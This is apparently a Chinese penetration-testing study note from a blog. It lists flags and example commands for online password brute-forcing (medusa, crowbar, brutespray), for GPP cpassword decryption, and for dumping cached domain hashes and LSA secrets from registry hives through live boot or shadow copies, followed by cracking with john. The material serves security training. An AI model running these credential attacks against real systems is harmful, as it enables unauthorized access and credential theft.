代码编织梦想

目录

medusa在线密码破解工具

支持多种常见协议(身份认证)

gpp-decrypt-域策略审计

 crowbar-在线密码破解工具

brutespray在线密码破解工具

polenum-组策略枚举

rsmangler-自定义字典

cachedump_lsadump-Windows认证提取


medusa在线密码破解工具

支持多种常见协议(身份认证)

medusa -d            #模块列表(支持协议)
medusa -M ftp -q     #查看模块参数
medusa -M ftp -m MODE:EXPLICIT

指定目标
-h                #单一目标
-H                #目标列表文件
-C file.txt       #host:user:password
-n                #非标准端口

账号/密码
-u            #指定用户名
-U            #用户名字典
-p            #指定密码
-P            #密码字典
-e[n/s/ns]    #n空密码、S密码与用户名相

其他
-O            #保存扫描结果
-s            #SSL
-v/-W         #显示详细[0-6] / debug [0-10]

速度控制
-g    #连接超时时间(默认3秒)
-r    #重试间隔时间(默认3秒)
-R    #重试次数(不包含首次)
-t    #每主机并发数
-T    #并发主机数
-f    #每主机首破成功后退出
-F    #所有主机首破成功后退出

 

gpp-decrypt-域策略审计

Windows域

  • 安全边界(域内互信)
  • 集中身份认证和资源管理
  • 组策略对象PGO (通过XML下发)
  • Windows server 2008增加了20多个组策略首选项
    • 设置客户端用户名密码
    • 文件夹选项、映射驱动器、打印机、服务、开始菜单、计划任务等
    • 颗粒度更加细化(强制、非强制)
    • XP、2003可通过安装客户端程序支持
  • 设置密码通过AES加密
    • 加密密钥被微软开发者站点泄漏
    • https://msdn.microsoft.com/en-us/library/2c15cbf0 -f086 4c74-8b70- 1f2fa45dd4be(prot.20).aspx
    • 域内所有用户都可以查看GPO中密文( cpassword )
    • 使用密钥解密即可获得密码
  • gpp-decrypt即为解密工具
  • \\lab.com\SYSVOLlab.com\Polices\{123a-123b-123c}\MACHINE\Preferences\Groups\Groups.xml
    本地缓存
    C:\ProgramData\Microsoft\Group Policy\History\{123c-123b-123c}Machine\Preferences\Groups\Groups.xml
    gpp-decrypt tL5ua5jOSKTyyD5fneuMrA

     

 

 crowbar-在线密码破解工具

支持协议

  • OpenVPN (-b openvpn)
  • RDP with NLA support (-b rdp)
  • SSH private key authentication (-b sshkey)
  • VNC key authentication (-b vpn)
指定目标
-s:单个目标( CIDR )
-S:目标字典文件
-p:指定非标准端口
-b:服务类型( openvpn, rdp, sshkey, vnckey )

用户名/字典
-u:单个用户名
-U:用户名字典文件
-c:单个密码
-C:密码字典文件

密钥/日志
-m: OpenVPN配置文件
-k:密钥文件/文件夹( SSH、VNC)
-l:保存日志文件(默认./crowbar.log)
-o:保存成功结果(默认./crowbar.out)

其他
-n:线程数
-t:超时时间
-q:安静模式(只显示成功结果)
-D: debug模式
-v:详细信息

crowbar -b rdp -u LAB\zhangsan -C Aa123456 -S 1.1.1.1/32
zhangsan@lab.com

crowbar -b sshkey -s 1.1.1.1/32 -u root -k /root/.ssh/id_rsa
ssh-keygen -t rsa -b 4096
ssh-copy-id yuanfh@1.1.1.1

crowbar -b vnckey -s 1.1.1.1/32 -p 5902 -k /root/.vnc/passwd

crowbar -b openvpn -s 1.1.1.1/32 -m vpnbook.ovpn -k
vpnbook ca.crt -u ypnbook -C pass.lst

ssh

ssh-keygen -t rsa -b 4096    #生成ssh公私钥
ls /root/.ssh/
ssh-copy-id msfadmin@192.168.0.108    #公钥传到msfadmin主机

crowbar -b sshkey -s 192.168.0.108/32 -u msfadmin -k /root/.ssh/id_rsa

 

brutespray在线密码破解工具

基于NMAP扫描报告自动进行密码爆破

  • 内建字典/指定账号、密码
  • 读取gnmap / xml格式报告
  • 可自动识别非标准端口服务( NMAP使用-sV参数)
  • 密码破解通过调用medusa实现
nmap -p21,22,23 1.1.1.1 -sV -oA scan
brutespray -f scan.gnmap 

参数
-u/-U    #用户名/用户名字典
-p/-P    #密码/密码字典
-t/-T    #并发线程数/并发主机数
-s       #指定服务类型
-o       #输出结果目录
-i       #交互模式

 

polenum-组策略枚举

Windows系统密码策略枚举工具,前提是已经掌握密码

polenum msfadmin:msfadmin@192.168.0.108 --protocols 139/SMB
polenum -u msfadmin -p msfadmin -d 192.168.0.108 --protocols 139/SMB

 

rsmangler-自定义字典

  • 纯暴力密码的效率太低(计算能力)
  • 人们构造密码的习惯
    • 姓名(自己/亲人/偶像/宠物)、爱好、专业、称谓、生日的组合变形

Rsmangler字典生成器

  • 基于有限数量的基本单词进行变形
  • 基本单词数量一般不超过5个(变形数量巨大)
rsmangler -f c.txt -m 5 -x 8 > result.txt    #将c.txt的基本单词进行变形,最长8,最短5

 

cachedump_lsadump-Windows认证提取

AD活动目录域本地缓存域身份认证信息
默认缓存10个身分验证信息    #DC离线时认证登陆
\HKLM\SECURITY\Cache     #管理员没有访问权限(system)

读取缓存的身份验证信息(加密的HASH)
读取的是账号密码的HASH(没有名文密码)

1.kali Live引导

在Windows上挂载kali镜像
fdisk -l
mount /dev/sda1 /mnt/
cd /mnt/Windows/System32/config
cachedump SYSTEM SECURITY


Kali上的cachedump有问题,可以github下载
git clone https://github.com/Neohapsis/creddump7.git
root@kali:~/creddump7# ./cachedump.py /mnt/Windows/System32/config/SYSTEM /mnt /Windows/System32/config/SECURITY true

密码破解
john --format=mscash2 --wordlist=pass.txt cred.txt

2.卷影副本VSS

https://github.com/reider-roque/pentest-tools
cscript vssown.vbs /list /status /mode /create /delete
cscript vssown.vbs /create #创建卷影副本
copy \\?GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY .    #拷贝副本
copy \\?GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM . 

3.lsadump

LSA:Local Security Authority    注册表中一个存储机密数据的区域
\HKLM\Security\Policy\Secrets    个人设置的服务运行账号、自动启动密码、拨号、VPN SMB等存储密码
sundll32.exe keymgr.dll,KRShowKeyMgr

lsadump读取其中保存的密码
lsadump SYSTEM SECURITY true

root@kali:~/creddump7# ./lsadump.py /mnt/Windows/System32/config/SYSTEM /mnt/Windows/System32/config/SECURITY true

 

 

 

 

 

 

 

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/qq_34640691/article/details/110382452